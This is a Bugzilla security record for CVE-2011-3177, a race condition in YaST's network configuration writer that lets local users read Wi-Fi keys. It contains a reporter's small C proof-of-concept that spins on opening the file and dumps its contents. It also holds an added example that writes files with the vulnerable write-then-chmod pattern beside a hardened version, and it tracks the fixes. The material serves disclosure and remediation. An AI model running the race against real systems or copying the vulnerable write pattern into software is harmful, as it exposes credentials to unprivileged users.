Bugzilla – Bug 713661
VUL-1: CVE-2011-3177: yast2-network: race condition allows reading keys by any local user
Last modified: 2021-02-26 20:31:00 UTC
Hi. There is a security bug in package 'yast2-network'. This bug is public. There is no coordinated release date (CRD) set.

Original posting:

---------- Forwarded message ----------
Subject: [security@suse.de] minor security problem in YaST
Date: Monday, 22 August 2011, 13:43:41
From: Justus Winter <winter@pre-sense.de>
To: security@suse.de

Hey everyone,

I found a problem in YaST that allows an unprivileged user to retrieve key material from the network configuration. NetworkInterfaces.ycp/Write() creates the configuration file(s) and changes the permissions of any file containing sensitive information to 0600. Any local user can race against this and read the content of the file.

Exploiting this is surprisingly reliable, probably due to the fact that all configuration files are updated before the file permissions are changed, the high cost of SCR::Execute(.target.bash, "/bin/chmod 0600 " + file); just to do a chmod(2), or the execution speed of the ycp interpreter.

The attached program demonstrates the problem:

$ ./race-for-ifcfg /etc/sysconfig/network/ifcfg-wlan0
Got handle...
BOOTPROTO='none'
[...]
WIRELESS_KEY_0='h:aaaaaaaaaaaaaaaa'
[...]
$ ls -l /etc/sysconfig/network/ifcfg-wlan0
-rw------- 1 root root 791 Aug 22 12:06 /etc/sysconfig/network/ifcfg-wlan0

This problem is present in the svn head of YaST.

Cheers,
Justus

--
Justus Winter winter@pre-sense.de
PRESENSE Technologies GmbH
Sachsenstr. 5, D-20097 HH
USt-IdNr.: DE263765024
Geschäftsführer/Managing Directors: Till Dörges, Jürgen Sander, Axel Theilmann
AG Hamburg, HRB 107844

Attached program (race-for-ifcfg.c):

    #include <stdio.h>
    #include <time.h>
    #include <unistd.h>   /* sleep() */

    int main(int argc, char **argv)
    {
        FILE *handle;
        char buffer[1000];
        size_t length;

        if (argc < 2)
            return 1;
        /* Spin until the target file can be opened for reading. */
        while (!(handle = fopen(argv[1], "r")));
        fprintf(stderr, "Got handle...\n");
        /* Let YaST finish writing; the already open handle is unaffected by the later chmod. */
        sleep(1);
        length = fread(buffer, 1, sizeof buffer - 1, handle);
        fwrite(buffer, 1, length, stdout);
        return 0;
    }
Yes. I will extend the interface of the ini-agent to set the file mode before its contents are written.

A quick grep for 'chmod' in an incomplete checkout of yast reveals similar bugs in
Kiwi.ycp (yast2-product-creator.rpm)
IscsiClientLib.ycp
Provider.ycp (yast2-network)
...

TODO: do a scan of the complete fresh checkout
TODO: Fix another common suspect: .target.string, filename, contents (probably extend filename to be a pair of filename, filemode)
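The race described in the original report, beside the fix approach named above (the mode is fixed before any contents are written), as an added example in C. This is not code from the report, from the ini-agent or from YaST; it assumes a POSIX system with a writable /tmp, and the file names, the demo_result struct and the sample ifcfg contents are constructed for the illustration.

```c
/* Added example, not code from the report or from YaST: the write-then-chmod
 * window beside a writer that fixes the mode before any secret byte hits disk.
 * Assumes POSIX and a writable /tmp.  cc -Wall -o ifcfg_race ifcfg_race.c */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for an ifcfg file; the key is a placeholder. */
static const char SAMPLE_IFCFG[] =
    "BOOTPROTO='none'\nWIRELESS_KEY_0='h:aaaaaaaaaaaaaaaa'\n";

struct demo_result {
    int ok;              /* 1 when every step below succeeded */
    int window_mode;     /* mode a racing reader sees between write and chmod */
    int final_vuln_mode; /* vulnerable writer's file after its late chmod */
    int hardened_mode;   /* hardened writer's file */
    int fd_bytes;        /* bytes read through an fd opened before chmod 0600 */
};

static int mode_of(const char *path)
{
    struct stat st;
    return stat(path, &st) < 0 ? -1 : (int)(st.st_mode & 07777);
}

/* VULNERABLE, the shape of NetworkInterfaces.ycp/Write() as reported: fopen()
 * creates 0666 & ~umask (0644 here), the secrets land, chmod runs last. */
static int write_then_chmod(const char *path, const char *contents)
{
    int window_mode;
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(contents, f);
    fclose(f);
    window_mode = mode_of(path);          /* secrets already readable here */
    if (chmod(path, 0600) < 0) return -1; /* too late for anyone who opened above */
    return window_mode;                   /* the mode visible in the window */
}

/* HARDENED: mkstemp() creates O_CREAT|O_EXCL at 0600 (fchmod pins that on old
 * libcs), bytes go to the private temp file, rename() swaps it in atomically. */
static int write_private_atomic(const char *path, const char *contents)
{
    char tmp[4096];
    size_t len = strlen(contents), off = 0;
    int fd;
    if (snprintf(tmp, sizeof tmp, "%s.XXXXXX", path) >= (int)sizeof tmp) return -1;
    if ((fd = mkstemp(tmp)) < 0) return -1;
    if (fchmod(fd, 0600) < 0) goto fail;
    while (off < len) {
        ssize_t n = write(fd, contents + off, len - off);
        if (n < 0) goto fail;
        off += (size_t)n;
    }
    if (fsync(fd) < 0) goto fail;
    if (close(fd) < 0 || rename(tmp, path) < 0) { unlink(tmp); return -1; }
    return 0;
fail:
    close(fd);
    unlink(tmp);
    return -1;
}

/* Why the PoC works: permissions are checked at open(2) only, so an fd obtained
 * while the file was 0644 keeps reading after chmod 0600. Run as the owner this
 * shows the descriptor semantics, not the uid boundary the real attack crosses. */
static int fd_survives_chmod(const char *path)
{
    char buf[256]; ssize_t n;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (chmod(path, 0600) < 0) { close(fd); return -1; }
    n = read(fd, buf, sizeof buf);
    close(fd);
    return n < 0 ? -1 : (int)n;
}

/* Runs both writers in a scratch directory under /tmp; the result is cached. */
static struct demo_result run_demo(void)
{
    static struct demo_result r; static int done;
    char dir[] = "/tmp/ifcfg-race.XXXXXX", vuln[4096], hard[4096];
    mode_t old;
    if (done) return r;
    done = 1;
    old = umask(022);                     /* usual default: new files 0644 */
    if (!mkdtemp(dir)) { umask(old); return r; }
    snprintf(vuln, sizeof vuln, "%s/ifcfg-wlan0.vuln", dir);
    snprintf(hard, sizeof hard, "%s/ifcfg-wlan0.hard", dir);
    r.window_mode = write_then_chmod(vuln, SAMPLE_IFCFG);
    r.final_vuln_mode = mode_of(vuln);
    r.hardened_mode = write_private_atomic(hard, SAMPLE_IFCFG) == 0 ? mode_of(hard) : -1;
    r.fd_bytes = chmod(vuln, 0644) == 0 ? fd_survives_chmod(vuln) : -1; /* reopen window */
    umask(old);
    unlink(vuln); unlink(hard); rmdir(dir);
    r.ok = r.window_mode == 0644 && r.final_vuln_mode == 0600 &&
           r.hardened_mode == 0600 && r.fd_bytes > 0;
    return r;
}
```

Calling run_demo() shows the vulnerable file sitting at 0644 with the key inside before the chmod, and an fd opened in that window still reading the whole file after the mode is tightened, which is exactly what race-for-ifcfg relies on. The hardened writer never exposes the real path in a readable-and-populated state because the mode is part of the create, not a separate step afterwards; it still depends on the enclosing directory not being writable by other users, which is the point made later in this bug about /etc/sysconfig/network/providers.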
CVE-2011-3177
submitted to SP2:

new API:
RPM: yast2-core-2.17.41
SVN: http://svn.opensuse.org/viewvc/yast?view=revision&revision=66761 to http://svn.opensuse.org/viewvc/yast?view=revision&revision=66764
IBS: https://build.suse.de/request/show/16267

using it:
RPM: yast2-2.17.117
SVN: http://svn.opensuse.org/viewvc/yast?view=revision&revision=66766
IBS: https://build.suse.de/request/show/16268

I have tested manually by creating a wireless ifcfg in yast2 lan and checking that the file has permissions 600 afterwards.
Please give me a SWAMP ID. The bug is quite old so probably all our products are affected.
The SRs in comment 3 had been rejected because of bnc#728950. It is fixed now, the new packages for SP2 are:

RPM: yast2-core-2.17.43
IBS: https://build.suse.de/request/show/17095

RPM: yast2-2.17.118
IBS: https://build.suse.de/request/show/17096
trunk: http://svn.opensuse.org/viewvc/yast?view=revision&revision=67117
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/99260 Factory / yast2-core
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/99267 Factory / yast2
The SWAMPID for this issue is 45972. This issue was rated as low. Please submit fixed packages until 2012-04-06. Also create a patchinfo file using this link: https://swamp.suse.de/webswamp/wf/45972
(In reply to comment #1)
> A quick grep for 'chmod' in an incomplete checkout of yast reveals similar bugs
> in
> Kiwi.ycp (yast2-product-creator.rpm)
> IscsiClientLib.ycp
> Provider.ycp (yast2-network)

Regarding Provider.ycp in yast2-network.rpm: it performs chown root, chmod 700, on /etc/sysconfig/network/providers only after writing files there, which leaves a window of vulnerability. BUT that directory has those permissions+owner to start with, from filesystem.rpm. Therefore it is not necessary to release an update (swamp 45972) for this, only to clean up the code in trunk.
> only to clean up the code in trunk
[for opensuse 12.2] http://svn.opensuse.org/viewvc/yast?view=revision&revision=67623

Still to do:
> Kiwi.ycp (yast2-product-creator.rpm)
> IscsiClientLib.ycp
I'll open separate reports for them.
Fix for the original report: comment 8. Per comment 13 I am removing "maint:running:45972:low maint:planned:update".

Filed:
bnc#753127 for Kiwi
bnc#753129 for IscsiClientLib

So closing.
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/113115 Factory / yast2-network
https://github.com/yast/yast-core/commit/7fe2e3df308b8b6a901cb2cfd60f398df53219de
yast2-network: https://github.com/yast/yast-network/commit/821946addad81a02e080198b0d0ec88ff90c96fd
yast2: https://github.com/yast/yast-yast2/commit/0a148d6db9133f6dc0fc7f96712c885533765e34